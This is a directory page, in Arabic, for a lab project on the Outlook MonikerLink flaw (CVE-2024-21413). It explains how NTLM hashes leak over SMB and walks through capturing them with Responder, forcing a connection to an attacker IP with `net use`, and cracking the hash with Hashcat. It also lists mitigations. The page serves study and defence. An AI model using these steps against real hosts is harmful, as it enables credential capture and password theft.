Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/sallocinavalcante/lab-smb-responder-cve-2024-21413
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
sallocinavalcante/lab-smb-responder-cve-2024-21413

lab-SMB-responder-CVE-2024-21413

مختبر تم إنشاؤه لاختبار الاختراق للثغرة CVE 2024-214113(MONIKER LINK).

عرض المستودع
2منذ 7 أشهرلم تتم المراجعة بعد

مختبر SMB + Responder (CVE-2024-21413)

🎯 الهدف

هدف هذا المشروع إلى دراسة الثغرة الأمنية CVE-2024-21413 (MonikerLink)، واستكشاف كيفية إساءة استخدام بروتوكول SMB/NTLM لالتقاط بيانات الاعتماد.
حتى بعد التصحيح الرسمي من مايكروسوفت، يُظهر المختبر أن المفهوم لا يزال صالحًا في السيناريوهات الداخلية.


📖 نظرية الاستغلال

تم تصنيف الثغرة (CVE-2024-21413)، المعروفة باسم MonikerLink، على أنها حرجة (CVSS 9.8). تحدث لأن Outlook كان يعالج روابط "file://" بطريقة غير آمنة، مستخدمًا واجهات برمجة تطبيقات COM القديمة (كائنات Moniker). سمحت هذه الكائنات لـ Outlook باستدعاء موارد خارجية دون المرور عبر Protected View، مما دفع العميل إلى بدء اتصالات SMB تلقائيًا.

1. ما هو Moniker Link؟

إنها ميزة في Windows تسمح بالإشارة إلى كائنات COM عبر روابط خاصة.

2. كيف كان Outlook يعالج file://

أساء الاستغلال الأصلي استخدام روابط "file://" أو مسارات UNC المرسلة عبر البريد الإلكتروني.

3. كيف حدث الالتفاف باستخدام "!"

عند إضافة الحرف "!" إلى الرابط، كان من الممكن تجاوز الحمايات الداخلية في Outlook، مما أجبر على الفتح المباشر للمورد الخارجي.

4. كيف تم كشف NTLM

أدى ذلك إلى مصادقة NTLM تلقائية، مما عرض تجزئات NetNTLMv2 للمهاجم دون تفاعل كبير من المستخدم.

5. ما الذي يصلحه التصحيح

التصحيح KB5002519 يحظر تحديدًا هذا السلوك في Outlook، ويمنع معالجة روابط "file://" بهذه الطريقة.

6. ما الذي لا يصلحه التصحيح

ومع ذلك، تستمر مصادقة NTLM التلقائية في العمل خارج سياق Outlook، أي أن أي محاولة للوصول إلى موارد SMB في بيئة يكون فيها NTLM مفعّلاً ولا توجد قيود مصادقة قد تظل تولّد إرسالًا تلقائيًا للتجزئات.


📌 العلاقة بين Outlook وSMB/NTLM وResponder الاستغلال الأصلي: عبر رسائل بريد إلكتروني عشوائية تحتوي على رابط خبيث ← يعالجه Outlook ← يصادق NTLM تلقائيًا ← يستلم المهاجم التجزئة.

المختبر الداخلي: قمنا بمحاكاة الجزء المفاهيمي فقط ← أجبرنا اتصال SMB يدويًا ← التقط Responder التجزئة ← نفذ Hashcat عملية الكسر.

لماذا لا يزال يعمل؟ لأن NTLM بروتوكول قديم يصادق تلقائيًا على اتصالات SMB، بغض النظر عن Outlook. التصحيح يصلح عميل Outlook، لكنه لا يلغي سلوك NTLM في Windows.


🏗️ بنية المختبر

  • المهاجم: Kali Linux مع Responder وHashcat.
  • الضحية: Windows مع تثبيت Outlook.
  • الشبكة: LAN محاكاة، دون تعرض خارجي.
  • الأدوات:
    • Responder → لتسميم البروتوكولات والتقاط التجزئات.
    • Hashcat → للكسر دون اتصال للتجزئات الملتقطة.

IP win
IP a Linux


🛡️ تصحيح Outlook

أثناء الاختبارات، حظر Outlook روابط file:// القادمة من البريد الإلكتروني، مع عرض تنبيه أمني:

تنبيه Outlook

ملاحظة

التصحيح KB5002519، الذي صدر في فبراير 2024، يخفف من الناقل الخارجي عبر البريد الإلكتروني عن طريق حظر روابط file://.
ومع ذلك، لا يزال بروتوكول NTLM يسمح بالمصادقة التلقائية على اتصالات SMB.
هذا يعني أنه على الرغم من أن Outlook محمي ضد هذا الاستغلال المحدد، فإن سطح الهجوم الداخلي يظل صالحًا.
جذر المشكلة يكمن في الاعتماد على NTLM كآلية مصادقة، والتي تظل عرضة لالتقاط التجزئات في اتصالات SMB.


📊 مقاييس المخاطر

  • CVE: CVE-2024-21413
  • CVSS: 9.8 (حرج)
  • التأثير: RCE + تسريب بيانات الاعتماد
  • الناقل: خارجي (Outlook) وداخلي (SMB/NTLM)
  • التخفيف الموصى به:
    • تطبيق التصحيح KB5002519.
    • تعطيل NTLM حيثما أمكن.
    • فرض Kerberos في بيئات Active Directory.
    • تنفيذ المصادقة متعددة العوامل وكلمات مرور قوية.

📚 الدروس المستفادة

  1. تصحيح Outlook يحظر فقط النقر على الروابط الخارجية.
  2. يظل SMB/NTLM سطح هجوم داخل الشبكة.
  3. يمكن التقاط تجزئات NetNTLMv2 وكسرها دون اتصال.
  4. كلمات المرور الضعيفة تُكتشف بسهولة في قوائم الكلمات الشائعة.
  5. حتى مع التصحيح الرسمي، تظل الثغرة ذات أهمية في السيناريوهات الداخلية.

📌 خطوة بخطوة

  1. بدء تشغيل Responder هنا نقوم بتشغيل Responder على واجهة الشبكة في Kali. يعمل كخادم SMB وهمي، جاهز للاستجابة لطلبات الضحية والتقاط بيانات اعتماد NTLM. هذه الخطوة ضرورية لتجهيز بيئة تسميم البروتوكولات والاعتراض. الأمر في Kali Linux:
root@kitploit:~
sudo responder -I eth0

Responder نشط


  1. فرض اتصال SMB
    في Windows، نصل يدويًا إلى مورد SMB يشير إلى عنوان IP الخاص بالمهاجم. يؤدي هذا الوصول إلى إجبار عميل Windows على محاولة المصادقة تلقائيًا عبر NTLM، وإرسال التجزئة إلى الخادم الوهمي (Responder). في هذه اللحظة يحدث الكشف الأولي لبيانات الاعتماد. يمكننا فرض اتصال SMB بطريقتين:

عبر Explorer، بالوصول يدويًا إلى:

root@kitploit:~
\\<IP do atacante>\test.

فرض SMB في Explorer

عبر الطرفية (cmd أو PowerShell)، باستخدام الأمر:

root@kitploit:~
net use \\<IP do atacante>\test

فرض SMB في الطرفية

  1. التقاط التجزئة
    يعترض Responder محاولة المصادقة ويحفظ تجزئة NTLMv2 في ملف سجل داخل /usr/share/responder/logs/. يحتوي هذا الملف على المادة الخام التي ستُستخدم للكسر. هنا نُظهر الثغرة: حتى بدون كلمة مرور كنص واضح، يمكن التقاط التجزئة وإعادة استخدامها.
root@kitploit:~
/usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

تجزئة التقطها Responder


  1. الكسر باستخدام Hashcat
    قبل تشغيل Hashcat، ننسخ التجزئة من السجل إلى ملف في مجلدنا الرئيسي (~/hash.txt). هذا يسهل التعامل ويضمن وصول Hashcat مباشرة إلى المحتوى. بعد ذلك، نشغّل Hashcat في الوضع 5600 (NetNTLMv2) مع قائمة الكلمات rockyou.txt. تحاول هذه العملية كسر التجزئة دون اتصال، مما يوضح كيف يمكن اكتشاف كلمات المرور الضعيفة بسرعة. تظهر النتيجة ما إذا تم العثور على كلمة المرور، مما يبرز الخطر الحقيقي للثغرة.
root@kitploit:~
hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt

ملاحظة:
لا يتم عرض كلمة المرور الحقيقية لأسباب أمنية. الهدف هو توضيح العملية والثغرة.

أمر Hashcat نتيجة الكسر

✅ الخلاصة

أظهر هذا المختبر أن:

  • الاستغلال عبر Outlook تم حظره بواسطة التصحيح.
  • ومع ذلك، لا يزال من الممكن التقاط تجزئات SMB وكسرها يدويًا.
  • تظل الثغرة صالحة كمفهوم، مما يعزز أهمية التقوية الداخلية، وكلمات المرور القوية، والانتقال إلى Kerberos/المصادقة المستندة إلى الرموز.
تنزيل الأداة